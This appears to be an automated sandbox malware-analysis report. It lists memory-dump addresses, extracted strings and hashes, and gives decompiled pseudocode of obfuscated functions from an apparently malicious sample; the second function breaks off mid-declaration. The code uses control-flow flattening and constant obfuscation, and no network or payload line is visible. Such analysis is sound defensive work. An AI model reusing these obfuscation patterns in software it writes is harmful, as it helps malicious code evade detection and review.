0x00c9b997
0x00c9b997
0x00c9b99c
0x00c9b99c
0x00c9b99c
0x00c9b9a2
0x00000000
0x00000000
0x00000000
0x00c9b9a2
0x00000000
0x00c9b99c
0x00c9b98e
0x00c9b9d9
0x00c9b9d0
0x00c9b9c8
0x00c9b9bc
0x00c9b9b4
0x00c9bdc3
0x00c9bdcc
0x00000000
0x00c9baf6
0x00c9baf6
0x00c9bafc
0x00c9bd88
0x00000000
0x00c9bb02
0x00c9bb02
0x00c9bb08
0x00c9bd79
0x00c9bd80
0x00000000
0x00c9bb0e
0x00c9bb0e
0x00c9bb14
0x00c9bd50
0x00c9bd55
0x00c9bd58
0x00c9b98e
0x00c9b98e
0x00c9b98e
0x00c9b992
0x00000000
0x00c9b992
0x00c9bb1a
0x00c9bb1a
0x00c9bb1c
0x00c9bb86
0x00c9bb89
0x00c9bbb5
0x00c9bb8b
0x00c9bb8b
0x00c9bba0
0x00c9bbac
0x00c9bbac
0x00c9bbfb
0x00c9bc02
0x00c9bc02
0x00c9bc04
0x00c9bc06
0x00c9bc06
0x00c9bc59
0x00c9bc6a
0x00c9bc6f
0x00c9bc72
0x00c9bc74
0x00000000
0x00c9bc7a
0x00c9bc97
0x00c9bcab
0x00c9bcb0
0x00c9bcb3
0x00c9bcb5
0x00c9bce5
0x00c9bcfc
0x00c9bcfc
0x00c9bcfc
0x00c9bd24
0x00c9bd29
0x00c9bd29
0x00c9bd2c
0x00c9b98e
0x00c9b98e
0x00c9b98e
0x00c9b992
0x00000000
0x00c9b992
0x00c9b98e
0x00000000
0x00c9bb1e
0x00c9bb1e
0x00c9bb20
0x00000000
0x00c9bb26
0x00c9bb5f
0x00c9bb64
0x00c9bb67
0x00c9bb6b
0x00c9bb72
0x00c9bb77
0x00000000
0x00c9bb77
0x00c9bb20
0x00c9bb1c
0x00c9bb14
0x00c9bb08
0x00000000
0x00c9bafc
0x00c9b99c
0x00c9b997

Strings

("', xrefs: 00C9B2FF
GK, xrefs: 00C9B173
uc, xrefs: 00C9B89D
d=`, xrefs: 00C9B56D
}0, xrefs: 00C9B611
ev6, xrefs: 00C9B3A5
$, xrefs: 00C9B13B
]a, xrefs: 00C9B065
{, xrefs: 00C9B37C
]#,, xrefs: 00C9B162
Na!, xrefs: 00C9B01B
b, xrefs: 00C9B8BE
d=`, xrefs: 00C9B58A
z|, xrefs: 00C9B203
fQq!, xrefs: 00C9B945
]a, xrefs: 00C9B6CF
fQq!, xrefs: 00C9B954
? [, xrefs: 00C9AD72

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: ("'$? [$GK$]#,$d=`$d=`$ev6$fQq!$fQq!$uc$z|$$$Na!$]a$]a$b${$}0
API String ID: 0-1223376802
Opcode ID: 0bbdda70e80d743591314dde95c3fe4d8f2bac0f98b98eb9c6af487a23640235
Instruction ID: daef1ce66d17a5912d3d88128f99e4f931aab5d819aa15b02c997a356df39c1a
Opcode Fuzzy Hash: 0bbdda70e80d743591314dde95c3fe4d8f2bac0f98b98eb9c6af487a23640235
Instruction Fuzzy Hash: 12820F714083819FD7B9CF25D54AA9BBBE1BBC4308F108E1DE1DA96260D7B18949DF83

Uniqueness

Uniqueness Score: -1.00%

Function 00C95AB2, Relevance: 21.8, Strings: 17, Instructions: 590
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00C95AB2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				void* _t621;
				void* _t678;
				void* _t680;
				void* _t682;
				void* _t686;
				void* _t693;
				void* _t695;
				void* _t705;
				signed int _t711;
				signed int _t712;
				signed int _t713;
				signed int _t714;
				signed int _t715;
				signed int _t716;
				signed int _t717;
				signed int _t718;
				signed int _t719;
				signed int _t720;
				signed int _t721;
				signed int _t722;
				void* _t723;
				void* _t741;
				void* _t782;
				signed int _t799;
				void* _t800;
				signed int _t802;
				void* _t803;
				void* _t806;
				signed int* _t808;
				void* _t811;

				_push(0x20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00CB2523(_t621);
				_v24 = 0x577da5;
				_t808 =  &(( &_v280)[7]);
				_t806 = 0;
				_t705 = 0x992981b;
				_t802 = 0x46;
				_v24 = _v24 / _t802;
				_v24 = _v24 ^ 0x00013ff7;
				_v112 = 0x11ccad;
				_v112 = _v112 ^ 0x4655cea9;
				_t799 = 0x18;
				_v112 = _v112 / _t799;
				_v112 = _v112 ^ 0x02ed8015;
				_v192 = 0xb3435e;
				_v192 = _v192 ^ 0x5476ca73;
				_v192 = _v192 | 0x86afc529;
				_t711 = 0x41;
				_v192 = _v192 * 0x65;
				_v192 = _v192 ^ 0xcc9bf2c1;
				_v160 = 0xa26fd8;
				_v160 = _v160 | 0x1e457789;
				_v160 = _v160 + 0xffffff9a;
				_v160 = _v160 ^ 0x1ee77f73;
				_v116 = 0x30086e;
				_v116 = _v116 + 0x9b58;
				_v116 = _v116 | 0xa610ad2b;
				_v116 = _v116 ^ 0xa630afef;
				_v132 = 0xc7f8d9;
				_v132 = _v132 / _t711;
				_v132 = _v132 >> 6;
				_v132 = _v132 ^ 0x00000c4e;
				_v188 = 0x68adba;
				_v188 = _v188 >> 0xb;
				_v188 = _v188 + 0xdf5e;
				_v188 = _v188 + 0x578c;
				_v188 = _v188 ^ 0x000143ff;
				_v200 = 0xf08783;
				_t712 = 0x34;
				_v200 = _v200 * 0x47;
				_v200 = _v200 * 0x7e;
				_v200 = _v200 << 0xe;
				_v200 = _v200 ^ 0xdff58000;
				_v144 = 0x38ef5c;
				_t78 =  &_v144; // 0x38ef5c
				_v144 =  *_t78 * 0x3a;
				_t80 =  &_v144; // 0x38ef5c
				_v144 =  *_t80 / _t712;
				_v144 = _v144 ^ 0x003f8121;
				_v228 = 0xc2ca7f;
				_v228 = _v228 | 0xbadb225d;
				_v228 = _v228 * 0x34;
				_v228 = _v228 ^ 0xd260086f;
				_v228 = _v228 ^ 0x26cba9a3;
				_v220 = 0xfa4495;
				_v220 = _v220 | 0x88ca2f4f;
				_v220 = _v220 + 0xffff7be1;
				_v220 = _v220 ^ 0xf2c1623b;
				_v220 = _v220 ^ 0x7a3889fb;
				_v176 = 0x22196b;
				_t713 = 0x73;
				_v176 = _v176 * 7;
				_v176 = _v176 >> 7;
				_v176 = _v176 ^ 0x0001dd63;
				_v276 = 0x98ec05;
				_v276 = _v276 >> 0xc;
				_v276 = _v276 * 0x68;
				_v276 = _v276 >> 3;
				_v276 = _v276 ^ 0x00067c57;
				_v68 = 0xae747d;
				_v68 = _v68 | 0x05124624;
				_v68 = _v68 ^ 0x05b231eb;
				_v280 = 0xf8d1c6;
				_v280 = _v280 * 0x1c;
				_v280 = _v280 | 0xea15f9b4;
				_v280 = _v280 >> 0xb;
				_v280 = _v280 ^ 0x001d75af;
				_v268 = 0x7023c5;
				_v268 = _v268 * 0x30;
				_v268 = _v268 / _t713;
				_v268 = _v268 << 6;
				_v268 = _v268 ^ 0x0bb4a801;
				_v60 = 0xbac308;
				_v60 = _v60 + 0xffffe338;
				_v60 = _v60 ^ 0x00b6b7d0;
				_v36 = 0xecd648;
				_t714 = 5;
				_v36 = _v36 / _t714;
				_v36 = _v36 ^ 0x00254e20;
				_v260 = 0xd5088a;
				_v260 = _v260 * 0x6a;
				_v260 = _v260 + 0xffff6987;
				_v260 = _v260 * 0x35;
				_v260 = _v260 ^ 0x42f6e70f;
				_v136 = 0xbacd74;
				_v136 = _v136 + 0xffff36ec;
				_v136 = _v136 * 0x60;
				_v136 = _v136 ^ 0x45cdb8fa;
				_v52 = 0xc178d5;
				_v52 = _v52 * 0x5f;
				_v52 = _v52 ^ 0x47c4a061;
				_v184 = 0x5699a9;
				_v184 = _v184 << 0xe;
				_v184 = _v184 >> 1;
				_v184 = _v184 ^ 0x5335f667;
				_v156 = 0x881879;
				_v156 = _v156 + 0xffff87c5;
				_v156 = _v156 >> 0xe;
				_v156 = _v156 ^ 0x00013456;
				_v164 = 0xdfb2f6;
				_v164 = _v164 + 0xffff49bb;
				_v164 = _v164 ^ 0x6eb2aa12;
				_v164 = _v164 ^ 0x6e63c6eb;
				_v168 = 0x3b644e;
				_v168 = _v168 + 0xffff1ea7;
				_v168 = _v168 * 0x2f;
				_v168 = _v168 ^ 0x0ab0038a;
				_v236 = 0x555e72;
				_v236 = _v236 << 5;
				_v236 = _v236 + 0xffffce11;
				_v236 = _v236 >> 2;
				_v236 = _v236 ^ 0x02a9ef11;
				_v244 = 0xb4615f;
				_v244 = _v244 << 8;
				_v244 = _v244 ^ 0xaac634ac;
				_v244 = _v244 >> 9;
				_v244 = _v244 ^ 0x0001a936;
				_v252 = 0x84c56d;
				_v252 = _v252 | 0xe0c7380e;
				_t715 = 0x71;
				_v252 = _v252 * 0x7b;
				_v252 = _v252 / _t715;
				_v252 = _v252 ^ 0x0001e627;
				_v208 = 0x743a3c;
				_v208 = _v208 >> 0x10;
				_v208 = _v208 | 0x81de5d6a;
				_v208 = _v208 / _t802;
				_v208 = _v208 ^ 0x01d76d7e;
				_v44 = 0xfd85af;
				_v44 = _v44 | 0x7ab2340b;
				_v44 = _v44 ^ 0x7af9a8fa;
				_v172 = 0x5349dc;
				_t716 = 0x5c;
				_v172 = _v172 / _t716;
				_v172 = _v172 ^ 0xbfe72ba3;
				_v172 = _v172 ^ 0xbfee364a;
				_v128 = 0x52087a;
				_v128 = _v128 + 0xffffb2ae;
				_v128 = _v128 >> 8;
				_v128 = _v128 ^ 0x000925e5;
				_v248 = 0xc44695;
				_t717 = 0x70;
				_v248 = _v248 * 0x17;
				_v248 = _v248 << 0xd;
				_v248 = _v248 | 0x603c27a6;
				_v248 = _v248 ^ 0x6af21839;
				_v92 = 0x408d93;
				_v92 = _v92 * 0x35;
				_v92 = _v92 + 0xffff7249;
				_v92 = _v92 ^ 0x0d559f7d;
				_v256 = 0xd73509;
				_v256 = _v256 ^ 0x0cacdd47;
				_v256 = _v256 + 0x42fa;
				_v256 = _v256 << 6;
				_v256 = _v256 ^ 0x1f021d73;
				_v224 = 0x764ce4;
				_v224 = _v224 + 0x42fd;
				_v224 = _v224 >> 7;
				_v224 = _v224 + 0xffff86a8;
				_v224 = _v224 ^ 0x0003f000;
				_v264 = 0x8469fa;
				_v264 = _v264 ^ 0xa8d95880;
				_v264 = _v264 + 0xffff86fa;
				_v264 = _v264 << 5;
				_v264 = _v264 ^ 0x0b916974;
				_v216 = 0x2c2bd1;
				_v216 = _v216 + 0xe15a;
				_v216 = _v216 * 5;
				_v216 = _v216 / _t717;
				_v216 = _v216 ^ 0x000677ad;
				_v96 = 0xa27b9c;
				_v96 = _v96 >> 0xb;
				_v96 = _v96 + 0xffffdc19;
				_v96 = _v96 ^ 0xfff1defb;
				_v76 = 0x29665d;
				_v76 = _v76 >> 4;
				_v76 = _v76 ^ 0x0000f928;
				_v104 = 0x3dd3f8;
				_v104 = _v104 ^ 0x29d7c804;
				_v104 = _v104 + 0xffff0fcf;
				_v104 = _v104 ^ 0x29ec2a6e;
				_v232 = 0xd7cd53;
				_v232 = _v232 + 0xfffff316;
				_v232 = _v232 >> 0xd;
				_t718 = 0x37;
				_v232 = _v232 / _t718;
				_v232 = _v232 ^ 0x00026ebe;
				_v88 = 0x9f762f;
				_v88 = _v88 ^ 0x53088056;
				_v88 = _v88 ^ 0x5398c5d6;
				_v48 = 0x778408;
				_t719 = 0x1a;
				_v48 = _v48 * 0xa;
				_v48 = _v48 ^ 0x04a827e3;
				_v124 = 0xf41155;
				_v124 = _v124 / _t799;
				_v124 = _v124 | 0x4c675d60;
				_v124 = _v124 ^ 0x4c69a558;
				_v56 = 0x52fde7;
				_v56 = _v56 + 0xffffaaf0;
				_v56 = _v56 ^ 0x00584a4f;
				_v196 = 0x1209af;
				_v196 = _v196 + 0xdc05;
				_v196 = _v196 / _t719;
				_v196 = _v196 | 0xd87443c0;
				_v196 = _v196 ^ 0xd871b909;
				_v204 = 0x605434;
				_v204 = _v204 << 7;
				_v204 = _v204 << 0xf;
				_v204 = _v204 | 0x30836e67;
				_v204 = _v204 ^ 0x3d8b23ec;
				_v212 = 0x15d47d;
				_v212 = _v212 ^ 0x7b3a671b;
				_v212 = _v212 | 0xac8ef607;
				_v212 = _v212 + 0x7fea;
				_v212 = _v212 ^ 0xffb55c3c;
				_v140 = 0x9bf75a;
				_v140 = _v140 << 0x10;
				_v140 = _v140 + 0x980c;
				_v140 = _v140 ^ 0xf75cd8ff;
				_v240 = 0xf72558;
				_t720 = 0x54;
				_v240 = _v240 * 0x29;
				_v240 = _v240 << 4;
				_v240 = _v240 | 0x19e98343;
				_v240 = _v240 ^ 0x79e49fd7;
				_v32 = 0xa2f12d;
				_v32 = _v32 * 0x66;
				_v32 = _v32 ^ 0x40e2559c;
				_v120 = 0x74c948;
				_v120 = _v120 / _t720;
				_v120 = _v120 ^ 0x8b74ab3a;
				_v120 = _v120 ^ 0x8b7a945b;
				_t800 = 0xe9dac92;
				_v152 = 0x240c06;
				_t803 = 0xa65db9b;
				_v152 = _v152 ^ 0x96489e26;
				_v152 = _v152 ^ 0x2db1745a;
				_v152 = _v152 ^ 0xbbd649e4;
				_v148 = 0x7dbe27;
				_v148 = _v148 + 0xffffa075;
				_v148 = _v148 + 0x8100;
				_v148 = _v148 ^ 0x0074932c;
				_v84 = 0x6924e8;
				_t721 = 0x16;
				_v84 = _v84 * 3;
				_v84 = _v84 ^ 0x0130d0dd;
				_v28 = 0x7106b;
				_v28 = _v28 + 0xffff4dfa;
				_v28 = _v28 ^ 0x00040a0c;
				_v100 = 0xd5105b;
				_v100 = _v100 << 6;
				_v100 = _v100 + 0xffff04b2;
				_v100 = _v100 ^ 0x35448819;
				_v272 = 0x7ab441;
				_v272 = _v272 / _t721;
				_v272 = _v272 + 0xc85c;
				_v272 = _v272 + 0x5f14;
				_v272 = _v272 ^ 0x000463e3;
				_v64 = 0x232f31;
				_t722 = 0x61;
				_v64 = _v64 / _t722;
				_v64 = _v64 ^ 0x0005b08c;
				_v72 = 0xab1849;
				_v72 = _v72 + 0xffffcb3b;
				_v72 = _v72 ^ 0x00af2a02;
				_v80 = 0x951c37;
				_v80 = _v80 >> 0xf;
				_v80 = _v80 ^ 0x000db97f;
				_v180 = 0x3fe48a;
				_v180 = _v180 + 0xe0fe;
				_v180 = _v180 | 0x43b6596f;
				_v180 = _v180 ^ 0x43f3ab9c;
				_v108 = 0x948ae2;
				_v108 = _v108 ^ 0xfc9d698e;
				_v108 = _v108 ^ 0x8192bcc5;
				_v108 = _v108 ^ 0x7d9d4cd7;
				_v40 = 0x5ab0e0;
				_v40 = _v40 * 0x46;
				_v40 = _v40 ^ 0x18c5c44a;
				while(1) {
					L1:
					_t678 = 0xd5afe1a;
					while(1) {
						L2:
						_t723 = 0x9b1e4fa;
						_t782 = 0x491e516;
						do {
							while(1) {
								L3:
								_t811 = _t705 - 0xa39355c;
								if(_t811 > 0) {
									break;
								}
								if(_t811 == 0) {
									_push(_v280);
									_push(0xc91070);
									_t686 = E00C93F5C(_v276, _v68, __eflags);
									_push(_v36);
									_push(0xc91030);
									__eflags = E00CA54FD(_v260,  &_v16, _t686, _v136, _v52, _v24, _v184, E00C93F5C(_v268, _v60, __eflags)) - _v112;
									_t705 =  ==  ? 0x491e516 : 0xbb35261;
									E00CB0352(_v156, _v164, _t686, _v168);
									E00CB0352(_v236, _v244, _t687, _v252);
									_t808 =  &(_t808[0xe]);
									_t800 = 0xe9dac92;
									goto L14;
								} else {
									if(_t705 == 0x35fff8c) {
										_t693 = E00CB002C(_a12, _v200, _v240, _v32, _v120, _a16, _v20, _v152);
										_t808 =  &(_t808[6]);
										__eflags = _t693 - _v144;
										_t678 = 0xd5afe1a;
										_t705 =  ==  ? 0xd5afe1a : 0x91eac5c;
										goto L2;
									} else {
										if(_t705 == _t782) {
											_push(_v172);
											_t695 = E00C93F5C(_v208, _v44, __eflags);
											_t741 = 0xc910a0;
											__eflags = E00CA55BD( &_v4,  &_v8, _t695, _v128, _t741, _v16, _v248, _v92, _v192, _v256, _v224, _v264) - _v160;
											_t705 =  ==  ? 0x9b1e4fa : _t800;
											E00CB0352(_v216, _v96, _t695, _v76);
											_t808 =  &(_t808[0xc]);
											L14:
											_t803 = 0xa65db9b;
											L28:
											_t678 = 0xd5afe1a;
											_t723 = 0x9b1e4fa;
											_t782 = 0x491e516;
											goto L29;
										} else {
											if(_t705 == 0x91eac5c) {
												E00CA18C8(_v100, _v272, _v20);
												_t705 = 0xc82d562;
												while(1) {
													L1:
													_t678 = 0xd5afe1a;
													goto L2;
												}
											} else {
												if(_t705 == 0x992981b) {
													_t705 = 0xa39355c;
													continue;
												} else {
													if(_t705 != _t723) {
														goto L29;
													} else {
														_push(_t723);
														_v12 = E00C9F38A(_v8);
														_t705 =  !=  ? _t803 : _t800;
														while(1) {
															L1:
															_t678 = 0xd5afe1a;
															L2:
															_t723 = 0x9b1e4fa;
															_t782 = 0x491e516;
															goto L3;
														}
													}
												}
											}
										}
									}
								}
								L22:
								return _t806;
							}
							__eflags = _t705 - _t803;
							if(_t705 == _t803) {
								_t680 = E00CA3B54(_v8, _v48, _v12, _v116, _v16, _v124, _t723,  &_v20, _v56, _v132, _v196, _v204, _v212, _v140);
								_t808 =  &(_t808[0xc]);
								__eflags = _t680 - _v188;
								if(__eflags != 0) {
									_t705 = 0xc82d562;
									goto L28;
								} else {
									_t705 = 0x35fff8c;
									goto L1;
								}
							} else {
								__eflags = _t705 - 0xc82d562;
								if(_t705 == 0xc82d562) {
									E00C92043(_v12, _v64, _v72, _v80);
									_t705 = _t800;
									while(1) {
										L1:
										_t678 = 0xd5afe1a;
										goto L2;
									}
								} else {
									__eflags = _t705 - _t678;
									if(_t705 == _t678) {
										_t682 = E00CA3802(_v148, _v84, _v20, _v28, 0x20, _a8, _v228);
										_t808 =  &(_t808[5]);
										_t705 = 0x91eac5c;
										__eflags = _t682 - _v220;
										_t806 =  ==  ? 1 : _t806;
										while(1) {
											L1:
											_t678 = 0xd5afe1a;
											goto L2;
										}
									} else {
										__eflags = _t705 - _t800;
										if(_t705 != _t800) {
											goto L29;
										} else {
											E00C92153(_v176, _v180, _v108, _v16, _v40);
										}
									}
								}
							}
							goto L22;
							L29:
							__eflags = _t705 - 0xbb35261;
						} while (__eflags != 0);
						goto L22;
					}
				}
			}

0x00c95abc
0x00c95abe
0x00c95ac5
0x00c95acc
0x00c95ad3
0x00c95ada
0x00c95adb
0x00c95adc
0x00c95ae1
0x00c95aec
0x00c95af8
0x00c95afa
0x00c95b01
0x00c95b06
0x00c95b0f
0x00c95b1a
0x00c95b25
0x00c95b37
0x00c95b3c
0x00c95b45
0x00c95b50
0x00c95b58
0x00c95b60
0x00c95b6d
0x00c95b70
0x00c95b74
0x00c95b7c
0x00c95b87
0x00c95b92
0x00c95b9a
0x00c95ba5
0x00c95bb0
0x00c95bbb
0x00c95bc6
0x00c95bd1
0x00c95be7
0x00c95bee
0x00c95bf6
0x00c95c01
0x00c95c09
0x00c95c0e
0x00c95c16
0x00c95c1e
0x00c95c26
0x00c95c33
0x00c95c34
0x00c95c3d
0x00c95c41
0x00c95c46
0x00c95c4e
0x00c95c59
0x00c95c61
0x00c95c68
0x00c95c71
0x00c95c78
0x00c95c83
0x00c95c8b
0x00c95c98
0x00c95c9c
0x00c95ca6
0x00c95cae
0x00c95cb6
0x00c95cbe
0x00c95cc6
0x00c95cce
0x00c95cd6
0x00c95ce5
0x00c95ce8
0x00c95cec
0x00c95cf1
0x00c95cf9
0x00c95d01
0x00c95d0b
0x00c95d0f
0x00c95d14
0x00c95d1c
0x00c95d27
0x00c95d32
0x00c95d3d
0x00c95d4a
0x00c95d4e
0x00c95d56
0x00c95d5b
0x00c95d63
0x00c95d70
0x00c95d7c
0x00c95d80
0x00c95d85
0x00c95d8d
0x00c95d98
0x00c95da3
0x00c95dae
0x00c95dc0
0x00c95dc3
0x00c95dca
0x00c95dd5
0x00c95de2
0x00c95de6
0x00c95df3
0x00c95df7
0x00c95dff
0x00c95e0a
0x00c95e1d
0x00c95e24
0x00c95e2f
0x00c95e42
0x00c95e49
0x00c95e54
0x00c95e5c
0x00c95e61
0x00c95e65
0x00c95e6d
0x00c95e78
0x00c95e83
0x00c95e8b
0x00c95e96
0x00c95ea1
0x00c95eac
0x00c95eb7
0x00c95ec2
0x00c95ecd
0x00c95ee0
0x00c95ee7
0x00c95ef4
0x00c95efc
0x00c95f01
0x00c95f09
0x00c95f0e
0x00c95f16
0x00c95f1e
0x00c95f23
0x00c95f2b
0x00c95f30
0x00c95f38
0x00c95f40
0x00c95f4f
0x00c95f52
0x00c95f5e
0x00c95f62
0x00c95f6a
0x00c95f72
0x00c95f77
0x00c95f87
0x00c95f8b
0x00c95f93
0x00c95f9e
0x00c95fa9
0x00c95fb4
0x00c95fc6
0x00c95fcb
0x00c95fd4
0x00c95fdf
0x00c95fea
0x00c95ff5
0x00c96000
0x00c96008
0x00c96013
0x00c96020
0x00c96021
0x00c96025
0x00c9602a
0x00c96032
0x00c9603a
0x00c9604d
0x00c96054
0x00c9605f
0x00c9606a
0x00c96072
0x00c9607a
0x00c96082
0x00c96087
0x00c9608f
0x00c96097
0x00c9609f
0x00c960a4
0x00c960ac
0x00c960b4
0x00c960bc
0x00c960c4
0x00c960cc
0x00c960d1
0x00c960d9
0x00c960e1
0x00c960ee
0x00c960f8
0x00c960fe
0x00c96106
0x00c96111
0x00c96119
0x00c96124
0x00c9612f
0x00c9613a
0x00c96142
0x00c9614d
0x00c96158
0x00c96163
0x00c9616e
0x00c96179
0x00c96181
0x00c96189
0x00c96194
0x00c96199
0x00c9619d
0x00c961a5
0x00c961b0
0x00c961bb
0x00c961c6
0x00c961db
0x00c961de
0x00c961e5
0x00c961f0
0x00c96206
0x00c9620d
0x00c96218
0x00c96223
0x00c9622e
0x00c96239
0x00c96244
0x00c9624c
0x00c9625c
0x00c96260
0x00c96268
0x00c96270
0x00c96278
0x00c9627d
0x00c96282
0x00c9628a
0x00c96292
0x00c9629a
0x00c962a2
0x00c962aa
0x00c962b2
0x00c962ba
0x00c962c5
0x00c962cd
0x00c962d8
0x00c962e3
0x00c962f0
0x00c962f1
0x00c962f5
0x00c962fa
0x00c96302
0x00c9630a
0x00c9631d
0x00c96324
0x00c9632f
0x00c96343
0x00c9634a
0x00c96357
0x00c96362
0x00c96367
0x00c96372
0x00c96377
0x00c96382
0x00c9638d
0x00c96398
0x00c963a3
0x00c963ae
0x00c963b9
0x00c963c4
0x00c963d9
0x00c963dc
0x00c963e3
0x00c963ee
0x00c963f9
0x00c96404
0x00c9640f
0x00c9641a
0x00c96422
0x00c9642d
0x00c96438
0x00c96448
0x00c9644c
0x00c96454
0x00c9645c
0x00c96464
0x00c96476
0x00c96479
0x00c96480
0x00c9648b
0x00c96496
0x00c964a1
0x00c964ac
0x00c964b7
0x00c964bf
0x00c964ca
0x00c964d2
0x00c964da
0x00c964e2
0x00c964ea
0x00c964f5
0x00c96500
0x00c9650b
0x00c96516
0x00c96529
0x00c96530
0x00c9653b
0x00c9653b
0x00c9653b
0x00c96540
0x00c96540
0x00c96540
0x00c96545
0x00c9654a
0x00c9654a
0x00c9654a
0x00c9654a
0x00c96550
0x00000000
0x00000000
0x00c96556
0x00c966ca
0x00c966d9
0x00c966de
0x00c966e3
0x00c966f7
0x00c9673f
0x00c9675b
0x00c9675f
0x00c96771
0x00c96776
0x00c96779
0x00000000
0x00c9655c
0x00c96562
0x00c966a5
0x00c966ac
0x00c966bb
0x00c966bd
0x00c966c2
0x00000000
0x00c96568
0x00c9656a
0x00c965de
0x00c965f2
0x00c965f8
0x00c96644
0x00c9665d
0x00c96661
0x00c96666
0x00c96669
0x00c96669
0x00c968bf
0x00c968bf
0x00c968c4
0x00c968c9
0x00000000
0x00c9656c
0x00c96572
0x00c965ce
0x00c965d4
0x00c9653b
0x00c9653b
0x00c9653b
0x00000000
0x00c9653b
0x00c96574
0x00c9657a
0x00c965b5
0x00000000
0x00c9657c
0x00c9657e
0x00000000
0x00c96584
0x00c96596
0x00c965a5
0x00c965b0
0x00c9653b
0x00c9653b
0x00c9653b
0x00c96540
0x00c96540
0x00c96545
0x00000000
0x00c96545
0x00c9653b
0x00c9657e
0x00c9657a
0x00c96572
0x00c9656a
0x00c96562
0x00c967d0
0x00c967da
0x00c967da
0x00c96783
0x00c96785
0x00c968a2
0x00c968a7
0x00c968aa
0x00c968ae
0x00c968ba
0x00000000
0x00c968b0
0x00c968b0
0x00000000
0x00c968b0
0x00c9678b
0x00c9678b
0x00c96791
0x00c96840
0x00c96847
0x00c9653b
0x00c9653b
0x00c9653b
0x00000000
0x00c9653b
0x00c96797
0x00c96797
0x00c96799
0x00c96804
0x00c96812
0x00c96815
0x00c9681a
0x00c9681c
0x00c9653b
0x00c9653b
0x00c9653b
0x00000000
0x00c9653b
0x00c9679b
0x00c9679b
0x00c9679d
0x00000000
0x00c967a3
0x00c967c6
0x00c967cb
0x00c9679d
0x00c96799
0x00c96791
0x00000000
0x00c968ce
0x00c968ce
0x00c968ce
0x00000000
0x00c968da
0x00c96540

Strings

$i, xrefs: 00C963C4
%, xrefs: 00C96008
`]gL, xrefs: 00C9620D
OJX, xrefs: 00C96239
Z, xrefs: 00C960E1
4T`, xrefs: 00C96270
<:t, xrefs: 00C95F6A
Nd;, xrefs: 00C95EC2
\59, xrefs: 00C965B5
1/#, xrefs: 00C96464
N%, xrefs: 00C95DCA
\8, xrefs: 00C95C59
n*), xrefs: 00C9616E
\59, xrefs: 00C9654A
r^U, xrefs: 00C95EF4
Lv, xrefs: 00C9608F
]f), xrefs: 00C9612F

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: N%$1/#$4T`$<:t$Nd;$OJX$Z$\59$\59$\8$]f)$`]gL$n*)$r^U$$i$%$Lv
API String ID: 0-3581384141
Opcode ID: 6dad327275035e2e88e3e88375d1449bca78e4732d998b605c8244fe032e487f
Instruction ID: c6d01af696a58126b18fd57aec8228754a86a023816c7bf91f7c751c81efb161
Opcode Fuzzy Hash: 6dad327275035e2e88e3e88375d1449bca78e4732d998b605c8244fe032e487f
Instruction Fuzzy Hash: 4062FF715083819BD7B8CF25C48AB9FBBE2BBC4304F108A1DE5DA86260D7B18949DF57

Uniqueness

Uniqueness Score: -1.00%

Function 00CA7ED1, Relevance: 20.7, Strings: 16, Instructions: 706
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00CA7ED1(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr* _v96;
				char _v100;
				void _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				void* _t812;
				void* _t816;
				void* _t819;
				void* _t827;
